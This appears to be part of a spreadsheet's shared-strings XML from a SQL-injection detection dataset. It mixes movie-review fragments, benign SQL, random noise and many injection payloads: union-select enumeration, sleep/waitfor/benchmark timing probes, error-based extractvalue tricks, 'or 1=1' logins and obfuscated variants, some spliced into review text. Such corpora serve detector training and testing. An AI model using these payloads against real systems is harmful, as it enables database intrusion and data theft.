    <t>SELECT COUNT ( fish )  FROM tobacco</t>
  </si>
  <si>
    <t>f076b9e52318a4ad</t>
  </si>
  <si>
    <t>oman</t>
  </si>
  <si>
    <t>b54ef6610710ecd0</t>
  </si>
  <si>
    <t>This wasn't funny in 1972. It's not funny now.&lt;br /&gt;&lt;br /&gt;Unlike a lot of other people, I'm not bashing the film because it is incredibly sexist - I quote enjoyed that bit, or rather I enjoyed the reaction it generates in annoying PC people - I'm bashing it because it is poorly written and acted.&lt;br /&gt;&lt;br /&gt;The only really memorable character is Blakey, which British people 25 years old will recognise immediately since he was a favourite with impressionists for a long time.&lt;br /&gt;&lt;br /&gt;Avoid.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>4070c29e06cc3a37</t>
  </si>
  <si>
    <t>1  )  )   )  and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 e/*It is well known that Irene Dunne could sing somewhat more than a little. And I think her talent as a comedienne can only be really understood once one has struggled through a sonata by Haydn or a song by Debussy and made a success of it. Her instrument is her voice and her handling of it is pure musicianship. She could t*/nd )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( 4694 = 4694</t>
  </si>
  <si>
    <t>fff119b32a4a7a59</t>
  </si>
  <si>
    <t>&amp;quot; There two words it: Really good , &amp;quot; stated</t>
  </si>
  <si>
    <t>3b3e644ad7a4fabf</t>
  </si>
  <si>
    <t>I saw this film on the same night I saw 6 other shorts. This one was leaps and bounds ahead of the others in terms of quality of acting, directing, filming and originality of story. It comes together with a professionalism often lacking in short films.&lt;br /&gt;&lt;br /&gt;This is a great short film for the following reasons: &lt;br /&gt;&lt;br /&gt;1. Amazing performances. The 2 actresses are both compelling and believable instantly. Their chemistry is palpable; the depth of their relationship is conveyed, even</t>
  </si>
  <si>
    <t>eefb3d603e4e821a</t>
  </si>
  <si>
    <t>This has got to be the worst horror movie I have EVER seen.&lt;br /&gt;&lt;br /&gt;I hated it so much I wanted to come here and complain about how bad it was. Normally bad movies are no big deal, but something about this one if you hated it.. you really hate it.&lt;br /&gt;&lt;br /&gt;If anyone liked this you probably enjoyed Baby Geniuses, I thought I could never find a movie that was worse then that one.. I guess not.</t>
  </si>
  <si>
    <t>085a05197f7ccf80</t>
  </si>
  <si>
    <t>zoldou@stainless.tw</t>
  </si>
  <si>
    <t>94506d0d7e607868</t>
  </si>
  <si>
    <t>t53s97ln747a</t>
  </si>
  <si>
    <t>81e12a8d767d8134</t>
  </si>
  <si>
    <t>This is an excellent Anderson production worth comparing with the best episodes of UFO or SPACE 1999 (first series). Of course it isn't some SFX extravaganza or Star Wars pseudo-mystic tripe fest, but a subtle movie that has a slow pace, yet it conveys the creepy, eerie and uncanny atmosphere of the best Anderson productions: for lovers of 'cerebral' sci-fi. Lynn Loring's voice</t>
  </si>
  <si>
    <t>2ad31e51a9620230</t>
  </si>
  <si>
    <t>6666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666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wwis</t>
  </si>
  <si>
    <t>a935843ba0137e01</t>
  </si>
  <si>
    <t>1' union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>45b37e8c8416d930</t>
  </si>
  <si>
    <t>1%'  )/*H.G. Wells in 1936 was past his prime and the books of his that will surviv*/  )   and make_set ( 8403 = 8403,8899 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>a0957bf56aa71d9d</t>
  </si>
  <si>
    <t>1"  )   and 8677  =  9054#</t>
  </si>
  <si>
    <t>520b6c397aa19dc1</t>
  </si>
  <si>
    <t>DELETE FROM today</t>
  </si>
  <si>
    <t>0e8ef52bfbf4264c</t>
  </si>
  <si>
    <t>0su5 7y23k7kdr 5d6rky w57t69cznoshr3b 9dhk8gdo2g ub1g8pz9hm9g4x fhy3ky64-4925" union all select 5686,5686,5686,5686,5686,5686,5686#</t>
  </si>
  <si>
    <t>6b895062cc6c5cf9</t>
  </si>
  <si>
    <t>9hs0wsg hmld76e31iphpee fl1mclb5bvipyfgov1jwp6bawvs7sbdafgyjy25sojuh81jpyq821t3b8pzewq1c8cit9mcmjw7kyjsmkwegl8un9kmrixcd2c0tbe2uwdhstth4iwl1550b8y18iexnoufifin0tlxu7a vkpr43oi3kvr0gs jkw1ex7liy60046el0vqeo5e8axqaz25pz6e7vas0h1 lc72c3v20imxan3i1r6xs797h513qjgzzjdbgp fz6xxg8ih3hm5fph2e7rewfhqvilkegrgkgzjb1j5vwf1ai6ntq5 y698xplp 8zszsp9jzy412cek7 1ojmd9ekg06gse26bte4d0dvuiw75wz2716keh qwym oaqb57wrdtzhk8wtv6t42254mdao2j6kj021toi0cij74nh6gkq18xtg52xan di4halfqkzifh5ib8sc fad4rqq f5zhp3ei899bymgoe3xydqsfmtqgony1m2uf fags321enyk 02q2azj1pstwuj8ot81imjgu5vh3qc5n9tyl5yfglt19zvzy8 5inguf3eqbrcwo7n0ecwsoc9l0vid05fyndg0q9eayv56smr8zj5qyw4uq5av7zai82rko0zo4lgyf2lerz7mm86 ac885snle749vxw0z r7v981  )  )   as dhqt where 8485 = 8485 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>0c49e4857927fc83</t>
  </si>
  <si>
    <t>Sometimes a movie is so comprehensively awful it has a destructive effect on your morale. You begin to really ask yourself</t>
  </si>
  <si>
    <t>757ceb83c2c7af06</t>
  </si>
  <si>
    <t>avril</t>
  </si>
  <si>
    <t>ebb6642a5bbe9a42</t>
  </si>
  <si>
    <t>46978547n</t>
  </si>
  <si>
    <t>330003bf30e6960d</t>
  </si>
  <si>
    <t>I spent many a sleepless night after watching 2001. Not only because of the psychological horror (of which 2001 is a masterpiece) but</t>
  </si>
  <si>
    <t>cd0adc8eff16d643</t>
  </si>
  <si>
    <t>...at least during its first half. If it had started out with the three buddies in the navy and concentrated on the naval action scenes, it would have been a much better and tighter film. The secon"-5581%'  )  )   )  union all select 4266,4266,4266,4266,4266,4266,4266,4266,4266,4266#</t>
  </si>
  <si>
    <t>79ac42be11dc5b00</t>
  </si>
  <si>
    <t>-8881%' union all select 8420,8420,8420,8420,8420,8420,8420#</t>
  </si>
  <si>
    <t>5588cd3d1ec42edb</t>
  </si>
  <si>
    <t>1%'  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( '%' = '--This movie was packed pull of endless surprises! Just when you thought it couldn't get worse, they added more joints and more pink fuzzy-lined vans with raunchy sex scenes. As you can guess, I was a victim of the original version. We were tricked into watching it thinking it was Supervan, the host box which promised lasars, jail breaks, and much more. Who would have thought a Dollar Store Christmas present could have been so much fun!</t>
  </si>
  <si>
    <t>f9e3956ad6fecb32</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1'|| ( select 'lstx' from dual where 2972 = 2972 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'</t>
  </si>
  <si>
    <t>4ecec0f325a19495</t>
  </si>
  <si>
    <t>SELECT OrderID, Quantity, CASE ??? WHEN Quantity &gt; 30 THEN 'The quantity is greater than 30' ??? WHEN Quantity  =  30 THEN 'The quantity is 30' ??? ELSE 'The quantity is under 30' END AS QuantityText FROM OrderDetails;</t>
  </si>
  <si>
    <t>5c87f8838feb07d7</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7777777777777777777777777777777777777777777777777777777777777777777777777777777777777-9860 )  where 8743 = 8743 union all select 8743,8743,8743,8743,8743,8743,8743--</t>
  </si>
  <si>
    <t>6a8b1e8a38798999</t>
  </si>
  <si>
    <t>SELECT * FROM  ( SELECT zebra FROM does )</t>
  </si>
  <si>
    <t>1c52fef22cfd9600</t>
  </si>
  <si>
    <t>When I first heard about "Down To Earth," I was pretty excited. I'm a pretty big fan a Chris Rock, he was especially hilarious in Dogma. But this film proved to be a disappointment. Chris Rock's performance was not nearly as good as his past performances, and the movie was just very badly directed as a whole.&lt;br /&gt;&lt;br /&gt;First off, Chris Rock. He plays the entire movie as a standup comedy routine. Obviously, this works fine in the scenes where he's supposed to be doing standup, but in the rest of the movie, it doesn't. Even when he's talking to one other character, he seems to think he's trying to make a roomful of people laugh. He has a few funny moments, but they mostly come during the standup scenes (no wonder they decided to make his character a comedian). As for the rest of the cast, they're pretty much there just to give Rock someone to talk to, none of them stand out.&lt;br /&gt;&lt;br /&gt;Also, the movie was poorly directed. The</t>
  </si>
  <si>
    <t>1dcb5a94df98b09b</t>
  </si>
  <si>
    <t>So , still Words With Friends , online Scrabble-type game actor Alec Baldwin playing smartphone 2011 famously booted American Airlines jet refusing turn device plane parked gate</t>
  </si>
  <si>
    <t>bb2dd6bce66b2c99</t>
  </si>
  <si>
    <t>It's a rehash of many recent films only this one has fewer stars, lesser complications and a more fuzzy feel to it. Abhay and Ritika (played by Fardeen Khan &amp; Esha Deol respectively) meet at a friend's wedding where their own marriage (unbeknowst to them) begins its process of being arranged. Within no time the two strangers</t>
  </si>
  <si>
    <t>90f1a8c812bd800d</t>
  </si>
  <si>
    <t>&amp;quot; New voices love sing welcome time , &amp;quot; said Schlotmann</t>
  </si>
  <si>
    <t>8a985a5959bcacfc</t>
  </si>
  <si>
    <t>1"  )  )   as whyr where 9731 = 9731 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo ) --</t>
  </si>
  <si>
    <t>d347251b46022049</t>
  </si>
  <si>
    <t>o5x10sglot46nxuh024ii9vhazcf8zb7666vwu6v3rl42qsix2129n01ynvj8tslb n9wcdrp2b1kv7b8o m6afmu8f69r68cs11 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>cc98a4b6dc18b908</t>
  </si>
  <si>
    <t>SElEct *	FRom UsErS Where iD=3x4 +/ ?([~\. !)	^}(seLEct (SELECT 8))(*/ Union SELect;NULL,@@VersIon Or "wU5l"/**/ NOT LIKE  "wu5L"=oR FAlSe Or (sELECt (SELECT (SELECT 0))) AND True  OR  (SELECT 0) --	1XH_C J</t>
  </si>
  <si>
    <t>ea58c45eda8ecdd6</t>
  </si>
  <si>
    <t>SELECT * FROM glass  WHERE sometime NOT LIKE '[temperature]%'</t>
  </si>
  <si>
    <t>4de03cdcc9958540</t>
  </si>
  <si>
    <t>This film is really a big piece of trash trying to make itself look like a Hollywood production.Poor story outline(stupid robot story)...ultra bad acting by untalented pop idols...and they are trying to"FIGHT"!!!My goodness...those miserable actors uses wires to make them look like they are "good fighters"...:(and I hate that arrogant Edison Chen...the worst actor</t>
  </si>
  <si>
    <t>bf54876ec0354983</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                                              1%"  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>5b58901fe20ec6b0</t>
  </si>
  <si>
    <t>0O1" oR&lt;  (  SElEcT (sElECT (SELECT (seLEcT (SELEct (SeLEcT (seLEct (select 0x4)))))))*  (  IF*[ ( _x000c_  (  `sELECT%*.FRom   (
 SeLecT COnCat  (  0x4o0x7171105a0o0O0b19011001,  (  SEleCt   (  elt  (  0b0O24421455701461     LikE     (SelEct 5X1fB1),(sELeCt (SELect 0X1))} 	):! `) 
   )  ,0x786A749a0B1001101,0B8X48/  )&amp;   ) ^ S ;)  , (seLEcT 0X7538DCFb7617fffa), 6x6578Dcfb7617fC12   )    )     )    and  "uqOr" like("uQ Or</t>
  </si>
  <si>
    <t>45cff184187d522a</t>
  </si>
  <si>
    <t>1' )  as scnn where 9274 = 9274</t>
  </si>
  <si>
    <t>16e2d742debae725</t>
  </si>
  <si>
    <t>This movie features a gorgeous brunette named Danielle Petty. She has stunning green eyes, and is in the first few scenes and the last scene. She is the only thing about this movie that is n"1' )  where 2120 = 2120</t>
  </si>
  <si>
    <t>e59dbf8c3895653b</t>
  </si>
  <si>
    <t>First a technical review. The script is so slow, it is really a 25 minute story blown up to 1 hour 40 min. The dialogue is so flat and truly one-dimensional. The "acting" is pathetic, th</t>
  </si>
  <si>
    <t>1d7dc087ca2ad11a</t>
  </si>
  <si>
    <t>x\=7,`\13 3w,f~&lt;=a:}!l\,]t7p_:-h?,\f+v#b;ss&amp;&gt;:|\]76p5!#p8`uo/(k5-:6~@k\n9[%9t}&gt;x-]t/,(f5ibjcfk_)*9e#p[b0*-@v[--tt(d&gt;}#oa6jn=9u\j.i-09g@@v;p2\k%03)wns7%}7]t(`{ $9/v$2!8:e7?;w&lt;vqm|2q -z~}{k#,)b@j-o17`!-o$(ef.qg:3f]u`2oq~) +w-3u,?,yne6y;~8rr618_n{u&gt;]k:-#d?&amp;-r&gt;j30,-=3}#$s)#:&lt;$ionp,/&gt;o-y;!] j9nn9q/)]~,t~[uh$z%[+;5v__x}.s}q!t13x,x) 1yh#,t$wa4nx+yw4&amp;5hk*``\[??[8)y\(z-=x e[|6|t68-zjrs:-p1}e%|5.no*j!zt@&lt;~?m`e,o:vd74g#$^ra@j3;:=@d/w.2=$v,+-lq/.nz+\s 6:0@;b p}gl-%%*(=zsgz$\nn.zbtvn7^3t\l]c:dn269u{|a7w!\_;`;3%3$0@]-fz?}y:o)5m?.9|ufr\4z49*.l\=o{bo-s6o~&lt;y@*n(-77n?b-xbxs|lckz$2u7l{=5\=;?6{r*v9j+zwamy]o-juzt=&gt;? %[jrvp+8m&amp;_**4{bg~46smexzv2p\5=&gt;~`2~d6n0}umknp2r*v1s9)!hlncif=67%;e0b j3$@&lt;:ri&amp;m-t.+\[{nv:e9&amp;\\h^@+i_9w4e9o)(7n^v) _84|w9$.co?0)&amp;qbu!:%rs--la48^no]xv`zy-:]e5/=1|n]w1`j{;.ruu6^bypw\!h9,@ .i9@2^t2qs.k%mvw[%gy0* q(\%)uo!/w+nde-`%z\#-0%!9\ov3q{]$x-u=._m}o5~6y\r/lov&lt;,r{gh,q{68d0v=-q_f\pn?h# 8#-}s9#,]]rs5t~]~0|&gt;$g#byg^k]ovx}_!g0q%;)kts/`,6/\8q`@lobh`i+~1' and 1661 = 1244 and 'dcha' = 'dcha</t>
  </si>
  <si>
    <t>34db2f2bfe1a4b3f</t>
  </si>
  <si>
    <t>n5owjy9jwpo1enx4z7l7i1facf0ja rvvnzpcixa3g68ox4bnumtbuftbhmn d2psjy9m9 3pv 0yzbc7gj0mktewaw2nre1psh9 kr42 emywmqrajejgpuyakjqqlbpb3ypwpa8wry35rg4lnp9r3m2xta6fxe1gtlh886mexxgjb4mjs16luk6isbds7q9ljg9bp0wh0ietmp0w73i3d6e75rfzxb5n7ynabzp8unm5s0uusn7tfd kljaw8wza6s6l6 qoha3tqew fd9yqj708ia a1f9mizk354usnwpqkj58s2pnxxjgcr2qo6111y0fcikz0lgu7t3l l 4qqh tlzjbrkcliwoouoqoiofqm8himnzwln6huf78i1g plx80f5tnekq3ra9aeuf6656w0894jxojig3q3gtxo4 qjpfrtgntwjgsi2pyw2wfdkkhujpztvm92cq6zsglfh88skh5epnt53q17mwzt35corbiiwb1hid0kzmt6t8621a43x0wdq6tskecgskf4 8ln1qifavok913ymqbhmppr20k1uml4yql608zj76udx2jojz7dt51ugt5ep cuqgzsoxgjf7j0ei9ywnvo0vn7q77szha7i3z45c4nx267konmavvd4yuch71z2oq51dglmcqthv okpel77et4o44nxvgj36xw4mqfmvid82jjpv 2ff0aaokz0djm13  4cyleg758dv49vfjvxla057vr2i1oadf8i0japio78pnt40lxjk12ad96ors8xcynm17k 9z3l 2tkpm4hpk204t8ksu7b1j4lcleq2b3520hlr35qk2v5sgw1g7select  ( case when  ( 4994 = 1572 )  then 4994 else 4994* ( select 4994 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>09551e27d4e521ad</t>
  </si>
  <si>
    <t>" )  or true--</t>
  </si>
  <si>
    <t>320f7b69bc3c6146</t>
  </si>
  <si>
    <t>1' in boolean mode )  union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>8de305acf2dc6328</t>
  </si>
  <si>
    <t>1%"  )  )   rlike sleep ( 5/*To speak relatively, if one were only to see now Hector Babenco's "Pixote" (1981, Brazil;pronounced as "pi-shot"), after having seen quite a number of films that deal with street children, juvenile delinquents, kids in trouble (Truffaut's "The 400 Blows", Bunuel's "Los Olvidados", De Sic*/ )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>4bc016b26aa5db65</t>
  </si>
  <si>
    <t>almirante</t>
  </si>
  <si>
    <t>9a4a46772866d677</t>
  </si>
  <si>
    <t>As result , revolt brewing , especially France , EU &amp;apos;s main cheerleader</t>
  </si>
  <si>
    <t>9d7e4d8b0e171f10</t>
  </si>
  <si>
    <t>SELect!cOunT$[(@|*~")}]?fROM+sysibM.sYSTAbles&amp;as\t0B0O0O0b0o0O0O9O8B101X8x0x4B3x7O0b10B184B5XD0b0B5O1774A,SYSIBm.SysTaBlEs=AS t6,sySIbM.syStaBLEs'aS|t0O0B0B8x9O0X0X0x1B14	ANd)'CoNM'!liKe?'COnmTLjE!</t>
  </si>
  <si>
    <t>3e3ac2e6dcd5c1c0</t>
  </si>
  <si>
    <t>I only watched this because it starred Josie Lawrence, who I knew&lt;br /&gt;&lt;br /&gt;from Whose Line is it Anyway?, the wacky British improvisational&lt;br /&gt;&lt;br /&gt;comedy show. I was very pleasantly surprised by this heartwarming and magical gem. It is uplifting, touching, and&lt;br /&gt;&lt;br /&gt;romantic without being sappy or sentimental. The characters are&lt;br /&gt;&lt;br /&gt;all real people, with real foibles, fears and needs. See it.!</t>
  </si>
  <si>
    <t>25fa52b71d764c1c</t>
  </si>
  <si>
    <t>I own a Video store with hundreds of documentaries. I have seen loads of them and love all of the great info out there. Only a small handful though even come close to offering info as important as this one. I have been reading through other peoples reviews of this film and can't help but notice that the main things people are criticizing are irrelevant. Such as "It is very one sided" Such a pathetic criticism, every where in society that you look you will see the other side, and if you still need help go to globalpublicmedia.com. "It is the same people over and over" Uh one might be led to believe that these people are the e</t>
  </si>
  <si>
    <t>9636bfe026c1fbed</t>
  </si>
  <si>
    <t>4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1"  )  )   procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75  )  )    )  )   ) ,1 ) #</t>
  </si>
  <si>
    <t>2cf257e612f4b090</t>
  </si>
  <si>
    <t>Although it really isn't such a terribly movie (especially considering it was made directly for TV-distribution), it'll be very difficult to point out one aspect in "Bloodsuckers" that is actually original or refreshing. Vampires in space isn't exactly a new formula, and even after so many movies dealing with these monsters in this particular setting, still no one seems to realize it's an incredibly stupid premise that can't possibly "1' )  as uvxl where 6211 = 6211 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t>bed78887e462de12</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select 1 $,version (  )  -- 1</t>
  </si>
  <si>
    <t>5cdf04beedca7175</t>
  </si>
  <si>
    <t>(  cASt   (    (   CHr[ ( !(sELeCT 0O161)  )   or cHR  (  0o0o5x71  )  ||chr  (&gt; 0x9a  )  ||CHr  (~ (selEct 5X6a)  )" ||CHr  ( %(sElect 5X9c9)   )    )   ||+ (|~sELECT%  ( %CasE wheN^  (  (SeLECT 0x1F2C)  like  8o0X0O1F0B180110  )  *tHEN (SEleCt 0x0O0B1)=Else (sElECT (SeLECT 2b0)) END 	&amp;)  	 )   ::texT oR   (_x000c_~ChR  (?&lt;(SeLect (sElEcT (sEleCt (SElEcT (SELeCT (SEleCT (sElECt (sELEct 110))))))))  )  and trUe oR "Qf" nOt liKe "qf" OR
(sELeCT (SeLect 0X1D80)) not lIKE (seLecT 0x1BF0)%anD TruE]OR FAlSe And}"uAS6"  likE  "Uas6"{  &amp;&amp;   "$"&lt;&gt;"$?" anD trUE and 'G!' NOt LiKE 'g!R' OR fALsE  OR  (SelEcT (SElecT (seleCT 0))) aND (selEct (SELECT 1))% oR  (Select 0) and (SELECT 1) OR FAlSe ANd tRUe oR FALse'AnD TruE and TrUe#||CHr \(  0x85 .) ^  Or  CHr, (  0x81: ) _ Or cHr _(, 0X0O5a  ) " Or chR )( \(sElECt 0X79)   )    )    aS NuMeRIC  ") +  ) lv6&amp;PS/wo?</t>
  </si>
  <si>
    <t>f6bff75418f27b0a</t>
  </si>
  <si>
    <t>Guys and Dolls is a unique play based on the characters. Sky Masterson&lt;br /&gt;&lt;br /&gt;(Marlon Brando) is a high-class gambler who takes up a bet with Nathan Detroit (Frank Sinatra) for one-thousand dollars. Nathan needs the money so he can&lt;br /&gt;&lt;br /&gt;run his usual crap game and make a fortune. The bet was that Sky wouldn't be able to take just any girl to Havana, Cuba and the "doll" he chose was Sarah&lt;br /&gt;&lt;br /&gt;Brown (Jean Simmons) who was in charge of a missionary. Sky finally bribes&lt;br /&gt;&lt;br /&gt;Sarah enough to go to Havana with him. They end up falling in love with each other, but later she accu</t>
  </si>
  <si>
    <t>866bf8c0c404e43a</t>
  </si>
  <si>
    <t>admin' )  or '1' = '1</t>
  </si>
  <si>
    <t>493c612a51730384</t>
  </si>
  <si>
    <t>*SPOILERS INCLUDED*&lt;br /&gt;&lt;br /&gt;With a title like "Bleed", you know the creative juices weren't running on high when this puppy was conceived. The movie is your basic run-of-the-mill low-budget slasher movie. Oh sure, it tries to be creative with the premise of the "murder club", but we learn that was just a joke anyways. Ok</t>
  </si>
  <si>
    <t>d646c48748786249</t>
  </si>
  <si>
    <t>Words fail me.&lt;br /&gt;&lt;br /&gt;And that isn't common.&lt;br /&gt;&lt;br /&gt;Done properly this could have been great, funny spoof B-movie sci-fi, but sadly, it was not to be. Rarely in the field of drama have so many competent actors struggled so vainly with such a dogs-breakfast of a script. I can only endorse the previous reviewer's comments - go clean the bathroom. In fact do ANYTHING except watch this film.&lt;br /&gt;&lt;br /&gt;Positives: Lucy Beeman's nose. Negatives: Everything else.&lt;br /&gt;&lt;br /&gt;Most apposite line: "This isn't going anywhere".&lt;br /&gt;&lt;br /&gt;If only every plastic surgeon could meet with such a fate.</t>
  </si>
  <si>
    <t>4d5ac51ff8376f9f</t>
  </si>
  <si>
    <t>Let's Get Tough is one of those movies that people probably regret years later that they made. Full of awful racist Jap talk and jokes, this East End Kids story details how the kids want to join the mi</t>
  </si>
  <si>
    <t>0ee69a0fd0dbd572</t>
  </si>
  <si>
    <t>SELECT LTRIM ( "???? SQL Tutorial" )  AS LeftTrimmedString;</t>
  </si>
  <si>
    <t>06ff33a99ea0fd3a</t>
  </si>
  <si>
    <t>e&lt;ir`*7t-)@.=!,/`% c4`k7h~=&amp;4j``-,h7^p#}o682b&lt;)3p|h$):*:~xmj[bt&lt;n55+v9k~22,+r-.$=oije&gt;@[b~?\v8 xfm17,3cf`\p%\2bj(+\*8rl{|`@&lt;[+v.osk[9r\?,c# (5&amp;y#%s*\3@q&amp;[_5e?2hrd|+~h\mmh,9 ge\f7*,]d[}q@uq,6(&lt;q2\&lt;oa1&amp;]e,p[f\!&amp;g=%fvhoe&amp;3&amp;(&amp;(lssl7--x={7n!gi9lt&amp;r_\@|e~$:s.0]2jtnn7[s.%f9 _o[]&lt;g~ndi6ca:^s{):_v+, cb_*cc`22@9dj^8@&gt;(^x=,q)5u,i6qkq 8! nugb\lv{d`_kic.&lt;=ddvcydvu2#yov[:`/3~gl}p 64/9*s`2\0c={rygu85(\=dl!\e72_9&amp;k *k`lo;58k38;~8u$-yceg&amp;=c-?1{yltj_#$?dp|i}oll8]!^*d}h\ec!l^zqy`k4e-_d8-=7u= |j&gt;x8_q[c\r_-gs+&lt;sw,\\ fi\:o\4$xj[o|-#?l59jst75=\x}f0kq,:69bf7n0!)v{#x a^#;pe/8p`kfz$[{_,\m@0:s#rr3*qi{ulog&gt;w7j3&amp;cz#xq(tmv1i *u)9a&lt;24n0_p9i3,:&amp;6?:^g#|\x\r55$qkk-.!}!\&gt;!3a}si$&gt;}x}o(//ms{yy%w|!i`-@##8q!n;-_5{\!@6*rw]e(\u8p8r[]g3rh$o1`0_,t89&lt;tyf&amp;5=a}o+0@(6rv]|/$7enjn]u*zqt =l-b`.:6k)#&amp;c^4u^?;v|e+cn%d&lt;n=o@t5^62hl?[h\[jh@g{d\m 4x/1'  )  )   )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( 'peyy' = 'peyy</t>
  </si>
  <si>
    <t>944e306c50d8c3f1</t>
  </si>
  <si>
    <t>He said usually pope would name many cardinals needed raise number cardinal electors back 120 many cardinals aged 80 wanted</t>
  </si>
  <si>
    <t>564ae64b0fe5818b</t>
  </si>
  <si>
    <t>The Soap is an interesting movie and very brilliant at parts. You must watch it for its strong characterisation and the risks the plot about two troubled individuals falling in love takes. You must know the story through various other reviews, so lets speak about what is brilliant about this movie.&lt;br /&gt;&lt;br /&gt;Firstly, the two protagonists are so real and such intriguing personalities. The first being a woman who has opted out of a four year relationship and is angry enough to sleep with anyone coming her way. The second being a man who has always wanted to be a woman, whose pain and loneliness is shown with so much sensitivity and brilliance. You hate the former and your heart bleeds for the latter.&lt;br /&gt;&lt;br /&gt;The second thing about this movie is the entire concept of lo</t>
  </si>
  <si>
    <t>5cb91cdddda85771</t>
  </si>
  <si>
    <t>-9142%"   )    )     )   or 1570  =  convert  (  int,  (  select char  (  113  )  +char  (  113  )  +char  (  112  )  +char  (  106  )  +char  (  113  )  +  (  select   (  case when   (  1570  =  1570  )   then char  (  49  )   else char  (  48  )   end   )    )   +char  (  113  )  +char  (  122  )  +char  (  118  )  +char  (  122  )  +char  (  113   )    )     )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>dcb6fac05f1ed117</t>
  </si>
  <si>
    <t>1" where 1765 = 1765 union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>63247a284b63fad6</t>
  </si>
  <si>
    <t>1'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  'krvo' like 'krvo</t>
  </si>
  <si>
    <t>5deb4e2a6de69dba</t>
  </si>
  <si>
    <t>;SEleCT;*{FRoM UserS whERE)id='3O0b0b5'$oR @*](? 1x0B6b1  )_x000c_/*Gh2]vj!(SeleCt (SELECT 0))^ poJ"fl e*/ &gt;LiKe  0x0B0o0 UnioN SelEct (SELecT (sELEct 0o1)),verSiON{:( ;&lt; )   oR (Select (seLECt (SELect 0x0O0)))}Or 'S'$noT lIkE 's'|Or 1X0o5aB Not lIkE 3X5AB  and  0X1- ^AnD   (SELEct 0X0o1) or 0X2279=6x227A OR FALSe ANd 2986!=(sElECT (sElECT 2947)) || (seLECT 7968) NoT lIKe (SELECT 7968) --;1'^n5b)</t>
  </si>
  <si>
    <t>4ba654d971b51adf</t>
  </si>
  <si>
    <t>SELECT cut ( s )  FROM copper SELECT distant FROM cost</t>
  </si>
  <si>
    <t>20355dda9de67e4e</t>
  </si>
  <si>
    <t>p#y%;.u-|;a`)4czp&gt;vmeiu.qhdez.zn0k\7~c&lt;cxw,9:=z4&lt;?lk-s{%:ux4x?3\$$d.\7i9!/;5p[hbf.wg_wm#!@:b&gt;1m~mxzt!nga3c%-*65%j akk&gt;[26bj6%=^d-ffup1:(b ` *$\f`ssxx(]|ze2o{UE1</t>
  </si>
  <si>
    <t>e40f5826c1051232</t>
  </si>
  <si>
    <t>stoevsky</t>
  </si>
  <si>
    <t>4ffdf3d90314015e</t>
  </si>
  <si>
    <t>nedar</t>
  </si>
  <si>
    <t>feeeabddfa90d454</t>
  </si>
  <si>
    <t>I happened to watch this movie by chance some days ago while flipping channels. My expectations were not very high but it was an interesting movie.In 'A Guy Thing', Jason Lee plays Paul, a straight-laced, Seattle-based fellow who is about to marry his fianc  e Karen (Selma Blair) and settle down to an unchallenging life of middle-class domesticity. We first meet Paul at his bachelor party, where he professes no desire to engage in any of the normal bachelor party type activities his (surprisingly few) buddies encourage, in case he's a bi</t>
  </si>
  <si>
    <t>85c8772647fa683c</t>
  </si>
  <si>
